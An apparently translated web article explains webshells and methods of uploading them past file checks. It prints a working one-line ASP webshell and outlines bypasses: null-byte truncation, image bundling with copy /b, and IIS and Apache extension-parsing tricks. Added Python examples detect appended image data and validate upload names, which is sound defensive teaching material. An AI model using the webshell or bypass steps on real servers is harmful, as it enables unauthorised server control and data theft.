Webshell Upload Attack Principle and Overview

Source: Internet
Author: User
Keywords: webshell, webshell definition, webshell detection
Webshells can be divided by scripting language into PHP script Trojans, ASP script Trojans, .NET-based script Trojans and JSP script Trojans. Abroad there are also dynamic web pages written in the Python scripting language, and of course webshells exist for them too. By function, webshells are further divided into big shells, small shells and one-line shells. For example, <%eval request("pass")%> is usually written into a file, the file is renamed to xx.asp, and it is then uploaded to the server. eval turns the value returned by request("pass") into code and executes it; the request function takes in external input (here the parameter named pass). This plays the same role as the client-side configuration of a Trojan horse.


Features of Webshell
1. Webshells mostly appear as dynamic scripts and can be described as website backdoor tools.

2. A webshell is an asp or php Trojan backdoor.

3. A webshell can pass through the server firewall: because the data exchanged with the controlled server or remote host travels over port 80, it is not intercepted by the firewall.

4. A webshell generally leaves no record in the system log, only some data submission records in the website's web log, so inexperienced administrators find it difficult to see traces of the intrusion.

5. The hacker places these asp or PHP Trojan backdoor files in the web directory of the web server, mixed in with normal web files. Through the web, the hacker can then control the compromised web server via the asp or php Trojan backdoor, including uploading and downloading files, viewing databases, executing arbitrary program commands, etc.



Webshell upload bypass method
(1) Bypassing front-end script extension detection to upload a Webshell

When a user selects a file on the client, no information is exchanged with the server at that point: the type of the uploaded file is judged by the front-end script alone.

Whitelist detection: uploading jpg, png and similar files is allowed. To upload a php file, add a .jpg suffix to the end of its name; after submission, use Burp to capture and intercept the request and delete the .jpg suffix.


(2) Using 00 truncation to upload a Webshell: the PHP functions involved

1. include and require generally read files inside the website

2. file_get_contents is generally used to open a url or a file

3. file_exists determines whether a file exists

4. Any parameter in the url can be controlled with %00

5. Truncation – local file inclusion

Truncation type: php%00 truncation

Truncation conditions: the PHP version is lower than 5.3.4, and php's magic_quotes_gpc is off

(1) When magic_quotes_gpc is on, all single quotes, double quotes, backslashes and null characters (%00) are escaped with a backslash.

(2) Many functions do something similar: addslashes(), mysql_escape_string(), mysql_real_escape_string(), etc.

(3) With magic_quotes_gpc turned off but the PHP version at 5.3.10, truncation still does not work. This shows that both conditions, the php version and gpc, must be met before truncation is possible.

(4) In addition to the above, file_get_contents can also be used together with php%00.

(5) Principle: the programmer did not filter the file upload path strictly when writing the program, resulting in a 0x00 upload truncation vulnerability. Assume the upload path is [http://xx.xx.xx.xx/upfiles/lubr.php .jpg]; replace the [.] after [lubr.php] with [0x00] (that is, capture the packet in Burp, switch to the hex view, and change the byte 2e, the hex code of [.], to 00, then click Forward to upload). When the file name is read, the [0x00] is taken as the end of the name, so the content of [lubr.php.jpg] is written to [lubr.php], achieving the purpose of the attack.


(3) Constructing image Trojans to bypass file-content detection and upload a Webshell

1. Windows bundling technique: copy /b mainfile + extrafile newfile, for example copy /b 7.jpg + 1.aspx c.jpg (appends the content of 1.aspx to the file 7.jpg and generates a new file named c.jpg); the extension [.jpg] is then changed to [.jpg.aspx].

2. GetImageSize function

This function checks whether the file is a valid image file (by its content characteristics); it does not check the file extension.
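A getimagesize-style content check is satisfied by a bundled file because the image part is still intact; what gives the bundling away is the data that follows the image's end marker. The Python example below is added here and is not code from the article: it walks the chunk structure of a PNG up to its IEND chunk, verifying each chunk's CRC, and reports whether any bytes follow it, which is exactly what copy /b leaves behind. The sample PNG is constructed inline, the appended bytes are a placeholder string, and the function names are my own. JPEG needs the same idea with a marker walk instead, which this example does not implement.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def png_chunk(chunk_type: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: length, type, data, CRC over type+data."""
    crc = zlib.crc32(chunk_type + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + chunk_type + data + struct.pack(">I", crc)


def make_sample_png() -> bytes:
    """Constructed sample: a well-formed 1x1 RGB PNG (not an image from the article)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # width, height, bit depth, colour type, ...
    scanline = b"\x00\xff\x00\x00"                       # filter byte + one red pixel
    return (PNG_SIGNATURE
            + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"IDAT", zlib.compress(scanline))
            + png_chunk(b"IEND", b""))


def png_end_offset(data: bytes):
    """Walk the chunk list and return the offset just past the IEND chunk.

    Returns None if the data is not a structurally valid PNG (bad signature,
    truncated chunk, CRC mismatch, or no IEND). Checking the structure rather
    than only the leading magic bytes is what separates this from a
    getimagesize-style test."""
    if not data.startswith(PNG_SIGNATURE):
        return None
    pos = len(PNG_SIGNATURE)
    while pos + 12 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        chunk_type = data[pos + 4:pos + 8]
        end = pos + 12 + length
        if end > len(data):
            return None
        (stored_crc,) = struct.unpack(">I", data[end - 4:end])
        if stored_crc != zlib.crc32(data[pos + 4:end - 4]) & 0xFFFFFFFF:
            return None
        if chunk_type == b"IEND":
            return end
        pos = end
    return None


def classify_png_upload(data: bytes) -> str:
    """'invalid'  : not a structurally valid PNG (reject)
       'trailing' : valid PNG followed by extra bytes, the copy /b pattern (reject or re-encode)
       'clean'    : the PNG ends exactly at IEND"""
    end = png_end_offset(data)
    if end is None:
        return "invalid"
    if end < len(data):
        return "trailing"
    return "clean"


if __name__ == "__main__":
    clean = make_sample_png()
    bundled = clean + b"APPENDED-SCRIPT-PLACEHOLDER"  # stands in for the appended 1.aspx content
    print(classify_png_upload(clean), classify_png_upload(bundled), classify_png_upload(b"GIF89a"))
```

On a "trailing" result the defensive action is to reject the upload, or to re-encode the image with an image library so that anything after the end of the image is discarded. Independently of any content check, the directory that receives uploads should never be served with a script handler, so that even a file that slips through is returned as data rather than executed.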


(4) Bypassing server-side extension detection on upload

1. IIS 6.0 parsing vulnerability

(1) Create a folder named *.asp or *.asa under the website; any file in that directory, whatever its extension, is executed by IIS as an asp file. For example, create the directory vidun.asp; then /vidun.asp/1.jpg is executed as an asp file.

(2) When uploading a picture to the website, rename the web Trojan file to ".asp;.jpg"; IIS also interprets and executes it as an asp file. For example, if an image file named "vidun.asp;.jpg" is uploaded, the file is parsed and executed as an ASP file.


2. Apache parsing vulnerability

(1) Whatever the file's suffix, as long as the name ends in .php.*, the apache server parses it as a php file.

(2) The mime.types configuration file defines the file types Apache can parse.

(3) When apache encounters xxx.php.rar or xxx.php.111, extensions that are not defined in the mime.types file are by default parsed as php files.

(4) Principle: when the browser submits a file to the server, the server checks the submitted file extension against the configured black or white list. If the extension does not satisfy the whitelist, the upload is refused; otherwise it succeeds. Rename the Trojan file [lubr.php] to [lubr.php.abc]. First, when the server verifies the extension it sees [.abc] (the file name is parsed from right to left), so as long as that extension satisfies the server-side whitelist rules the file can be uploaded. Then, when the file is requested from the browser, Apache cannot resolve the [.abc] extension and looks further left for an extension it can parse, namely [.php]. In short, the Trojan is parsed, that is, it can be connected to with China Chopper.
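Every bypass in sections (1), (2) and (4) defeats a server that looks only at the tail of the client-supplied file name: the null byte hides the real extension from a suffix check, ".asp;.jpg" and "/vidun.asp/1.jpg" smuggle a separator past it, and "lubr.php.abc" relies on the server and Apache disagreeing about which extension counts. The Python example below is added here and is not code from the article. It contrasts such a tail-only check with a validator that rejects null bytes, discards path components, allows one small character set per dot-separated segment, requires every extension segment (not just the last) to be on the allow-list, and assigns a server-chosen stored name. The file names come from the article; the function names and the allow-list are my own.

```python
import re
import secrets

ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
# Characters permitted in each dot-separated segment of a file name.
SAFE_SEGMENT = re.compile(r"^[A-Za-z0-9_-]+$")


def naive_extension_check(filename: str) -> bool:
    """The kind of check the bypasses above defeat: it inspects only the tail
    of the client-supplied name."""
    return filename.lower().endswith(tuple("." + e for e in ALLOWED_EXTENSIONS))


def validate_upload_name(filename: str):
    """Return (accepted, reason, stored_name).

    stored_name is chosen by the server (random token + vetted extension); the
    client-supplied name is consulted only to derive the extension, so the
    directory-name trick (/vidun.asp/1.jpg) and path traversal never reach disk."""
    if "\x00" in filename:
        # A NUL is what the 0x00 truncation relies on; no legitimate name contains one.
        return False, "null byte in file name", None
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    parts = base.split(".")
    if len(parts) < 2 or not all(parts):
        return False, "missing or empty extension", None
    stem, exts = parts[0], parts[1:]
    if not SAFE_SEGMENT.match(stem) or not all(SAFE_SEGMENT.match(e) for e in exts):
        # Rejects ';' (IIS 6 vidun.asp;.jpg), spaces and other separators.
        return False, "unexpected characters in file name", None
    # Every extension segment must be allowed, not just the last one: Apache may
    # fall back to an inner .php when it cannot map the final one (lubr.php.abc).
    disallowed = [e for e in exts if e.lower() not in ALLOWED_EXTENSIONS]
    if disallowed:
        return False, "disallowed extension segment(s): " + ", ".join(disallowed), None
    stored = secrets.token_hex(16) + "." + exts[-1].lower()
    return True, "ok", stored


if __name__ == "__main__":
    samples = ["photo.jpg", "lubr.php\x00.jpg", "vidun.asp;.jpg", "lubr.php.abc", "vidun.asp/1.jpg"]
    for name in samples:
        print(repr(name), naive_extension_check(name), validate_upload_name(name)[:2])
```

A name check is only one layer: combine it with a content check on the bytes, store uploads under the server-chosen name in a directory that has no script handler mapped, and on Apache map the PHP handler with a pattern that matches the final extension only (a FilesMatch on "\.php$") rather than an AddHandler directive, which applies to .php wherever it appears in a multi-extension name.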